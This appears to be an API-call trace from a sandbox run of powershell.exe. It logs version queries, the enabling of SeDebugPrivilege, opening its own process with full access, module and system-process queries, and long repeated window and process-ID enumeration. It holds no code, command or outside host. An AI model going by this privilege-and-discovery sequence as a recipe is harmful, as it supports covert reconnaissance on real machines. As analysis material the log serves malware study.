	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc51d8, puLen=0x25e880) returned 1
	[0033.193] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0033.193] lstrcpyW (in: lpString1=0x190b58, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc4e80, puLen=0x25e880) returned 1
	[0033.193] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0033.193] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x0, puLen=0x25e880) returned 0
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x0, puLen=0x25e880) returned 0
	[0033.194] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x0, puLen=0x25e880) returned 0
	[0033.194] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e878, puLen=0x25e874 | out: lplpBuffer=0x25e878*=0x1fc4e28, puLen=0x25e874) returned 1
	[0033.195] VerLanguageNameW (in: wLang=0x0, szLang=0x190b58, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0033.196] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\", lplpBuffer=0x25e88c, puLen=0x25e888 | out: lplpBuffer=0x25e88c*=0x1fc4db4, puLen=0x25e888) returned 1
	[0033.320] GetCurrentProcessId () returned 0xdd0
	[0033.453] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x25e0c4 | out: lpLuid=0x25e0c4*(LowPart=0x14, HighPart=0)) returned 1
	[0033.455] GetLastError () returned 0x0
	[0033.457] GetCurrentProcess () returned 0xffffffff
	[0033.457] GetLastError () returned 0x0
	[0033.459] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x25e0c0 | out: TokenHandle=0x25e0c0*=0x2e8) returned 1
	[0033.459] GetLastError () returned 0x0
	[0033.461] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x1fc78cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0033.461] GetLastError () returned 0x514
	[0033.464] CloseHandle (hObject=0x2e8) returned 1
	[0033.464] GetLastError () returned 0x514
	[0033.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd0) returned 0x2e8
	[0033.469] GetLastError () returned 0x514
	[0033.479] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x1fc7910, cb=0x100, lpcbNeeded=0x25e8b4 | out: lphModule=0x1fc7910, lpcbNeeded=0x25e8b4) returned 1
	[0033.480] GetLastError () returned 0x514
	[0033.482] GetModuleInformation (in: hProcess=0x2e8, hModule=0x21f80000, lpmodinfo=0x1fc7a50, cb=0xc | out: lpmodinfo=0x1fc7a50*(lpBaseOfDll=0x21f80000, SizeOfImage=0x72000, EntryPoint=0x21f87363)) returned 1
	[0033.483] GetLastError () returned 0x514
	[0033.485] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x21f80000, lpBaseName=0x191318, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0033.485] GetLastError () returned 0x514
	[0033.486] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x21f80000, lpFilename=0x191318, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0033.486] GetLastError () returned 0x514
	[0033.487] CloseHandle (hObject=0x2e8) returned 1
	[0033.487] GetLastError () returned 0x514
	[0033.493] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xdd0) returned 0x2e8
	[0033.494] GetLastError () returned 0x514
	[0033.497] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x1fc6f00 | out: lpExitCode=0x1fc6f00*=0x103) returned 1
	[0033.497] GetLastError () returned 0x514
	[0033.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fc5278, Length=0x20000, ResultLength=0x25e8fc | out: SystemInformation=0x2fc5278, ResultLength=0x25e8fc*=0xa640) returned 0x0
	[0033.519] EnumWindows (lpEnumFunc=0x1f83612, lParam=0x0) returned 1
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.522] GetLastError () returned 0x514
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.522] GetLastError () returned 0x514
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.522] GetLastError () returned 0x514
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.522] GetLastError () returned 0x514
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.522] GetLastError () returned 0x514
	[0033.522] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8b0
	[0033.522] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8f0
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.523] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.523] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x5008c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x73c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x73c
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x70050, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xd70
	[0033.524] GetLastError () returned 0x514
	[0033.524] GetWindowThreadProcessId (in: hWnd=0x30132, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xd54
	[0033.525] GetLastError () returned 0x514
	[0033.525] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.525] GetLastError () returned 0x514
	[0033.525] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.526] GetLastError () returned 0x514
	[0033.526] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.526] GetLastError () returned 0x514
	[0033.526] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.526] GetLastError () returned 0x514
	[0033.526] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.526] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x30098, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.527] GetLastError () returned 0x514
	[0033.527] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x200d4, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcd0
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xccc
	[0033.528] GetLastError () returned 0x514
	[0033.528] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcc8
	[0033.528] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x200fa, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x201ea, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc98
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.529] GetLastError () returned 0x514
	[0033.529] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.529] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb74
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb64
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb54
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb44
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb34
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb24
	[0033.530] GetLastError () returned 0x514
	[0033.530] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb14
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x20176, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb04
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xaf4
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xae4
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xad4
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xac4
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xab0
	[0033.531] GetLastError () returned 0x514
	[0033.531] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xaa0
	[0033.531] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x700ec, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xa7c
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x89c
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8b0
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8a4
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x20134, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8b0
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8a4
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8b0
	[0033.532] GetLastError () returned 0x514
	[0033.532] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x89c
	[0033.532] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x89c
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x5b4
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x7c0
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x50086, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x234
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.533] GetLastError () returned 0x514
	[0033.533] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.533] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x20030, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x30034, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x758
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x10036, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x594
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x30026, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x56c
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x73c
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x2002e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x508
	[0033.534] GetLastError () returned 0x514
	[0033.534] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.534] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8f0
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x47c
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x4004e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xdb4
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x40052, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xd54
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcac
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xc3c
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcd0
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xccc
	[0033.535] GetLastError () returned 0x514
	[0033.535] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xcc8
	[0033.535] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb74
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb64
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb54
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb44
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb34
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb24
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb14
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xb04
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xaf4
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xae4
	[0033.536] GetLastError () returned 0x514
	[0033.536] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xad4
	[0033.536] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xac4
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xab0
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xaa0
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0xa7c
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8a4
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x8b0
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x89c
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10046, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x758
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x594
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x56c
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x73c
	[0033.537] GetLastError () returned 0x514
	[0033.537] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.537] GetLastError () returned 0x514
